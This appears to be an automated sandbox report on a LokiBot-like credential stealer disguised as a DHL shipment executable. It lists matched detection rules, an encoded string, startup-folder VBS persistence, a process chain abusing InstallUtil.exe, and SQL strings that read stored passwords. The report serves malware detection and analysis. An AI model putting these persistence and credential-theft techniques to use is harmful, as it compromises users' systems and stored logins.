Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EDE9B5	6_2_06EDE9B5
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EDD765	6_2_06EDD765
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06ED8878	6_2_06ED8878
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF57E7	6_2_06EF57E7
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EFE8E0	6_2_06EFE8E0
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF0040	6_2_06EF0040
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF19A3	6_2_06EF19A3
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF75E0	6_2_06EF75E0
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF75DD	6_2_06EF75DD
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF75D0	6_2_06EF75D0
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF3D00	6_2_06EF3D00
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EFE8DB	6_2_06EFE8DB
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EFD080	6_2_06EFD080
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EFD090	6_2_06EFD090
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF0006	6_2_06EF0006
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0706CD29	6_2_0706CD29
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0706E338	6_2_0706E338
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0706003F	6_2_0706003F
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07060040	6_2_07060040
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0706D057	6_2_0706D057
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07069913	6_2_07069913
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07069918	6_2_07069918
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0706892E	6_2_0706892E
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07088080	6_2_07088080
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07085B78	6_2_07085B78
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07084840	6_2_07084840
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0708165D	6_2_0708165D
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07081650	6_2_07081650
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07081654	6_2_07081654
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07081660	6_2_07081660
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07088078	6_2_07088078
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07088072	6_2_07088072
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07085B74	6_2_07085B74
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07085A15	6_2_07085A15
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_070B0025	6_2_070B0025
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_070B0040	6_2_070B0040
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_072F9F88	6_2_072F9F88
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_072F9F98	6_2_072F9F98
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_072F9A28	6_2_072F9A28
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0737E700	6_2_0737E700
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07360006	6_2_07360006
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07360040	6_2_07360040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004269A0	7_2_004269A0

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Size.exe.0.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3837d70.9.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, -.cs	Base64 encoded string: 'WnhHBft3J1NRF/J/anVdHvA0SHJHFPN4ZXgPNvtuTG9AA+dbenJRHPx2cDpTFOpFT3RYHdB7ZGQPHu5FQG9RAOt7ZWhACKV9bHVrPft0bnVcStl/fVVNAftce25ZOf90bW1RSvl/fV56EPN/MkhaFftiRmcPI/t7bVJAA/d0bjp1FfohbmRALs51emhAGPF0MmZRBcFZfHNGFPBuTW5ZEPd0MlJRBdp7fWAPQ6kqPzQPMO1pbGxWHedJbHNCFOwhWmhZAfJ/SHJHFPN4ZXhxCe52ZnNRA6V4aGNRHeh3MnJZHvV/fWRHBQ=='
Source: Size.exe.0.dr, -.cs	Base64 encoded string: 'WnhHBft3J1NRF/J/anVdHvA0SHJHFPN4ZXgPNvtuTG9AA+dbenJRHPx2cDpTFOpFT3RYHdB7ZGQPHu5FQG9RAOt7ZWhACKV9bHVrPft0bnVcStl/fVVNAftce25ZOf90bW1RSvl/fV56EPN/MkhaFftiRmcPI/t7bVJAA/d0bjp1FfohbmRALs51emhAGPF0MmZRBcFZfHNGFPBuTW5ZEPd0MlJRBdp7fWAPQ6kqPzQPMO1pbGxWHedJbHNCFOwhWmhZAfJ/SHJHFPN4ZXhxCe52ZnNRA6V4aGNRHeh3MnJZHvV/fWRHBQ=='
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3837d70.9.raw.unpack, -.cs	Base64 encoded string: 'WnhHBft3J1NRF/J/anVdHvA0SHJHFPN4ZXgPNvtuTG9AA+dbenJRHPx2cDpTFOpFT3RYHdB7ZGQPHu5FQG9RAOt7ZWhACKV9bHVrPft0bnVcStl/fVVNAftce25ZOf90bW1RSvl/fV56EPN/MkhaFftiRmcPI/t7bVJAA/d0bjp1FfohbmRALs51emhAGPF0MmZRBcFZfHNGFPBuTW5ZEPd0MlJRBdp7fWAPQ6kqPzQPMO1pbGxWHedJbHNCFOwhWmhZAfJ/SHJHFPN4ZXhxCe52ZnNRA6V4aGNRHeh3MnJZHvV/fWRHBQ=='

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: InstallUtil.exe, 00000002.00000002.3287428643.000000000042A000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3287434454.0000000000438000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: (?@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe	Binary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbpL8@5

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/5@3/2

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs"

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogfirebasesMsNDblsEQMYcNOfhQJuUZQabadia.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	ReversingLabs: Detection: 57%
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Virustotal: Detection: 33%

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File read: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe "C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe"
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Size.exe "C:\Users\user\AppData\Roaming\Size.exe"
Source: C:\Users\user\AppData\Roaming\Size.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Size.exe "C:\Users\user\AppData\Roaming\Size.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
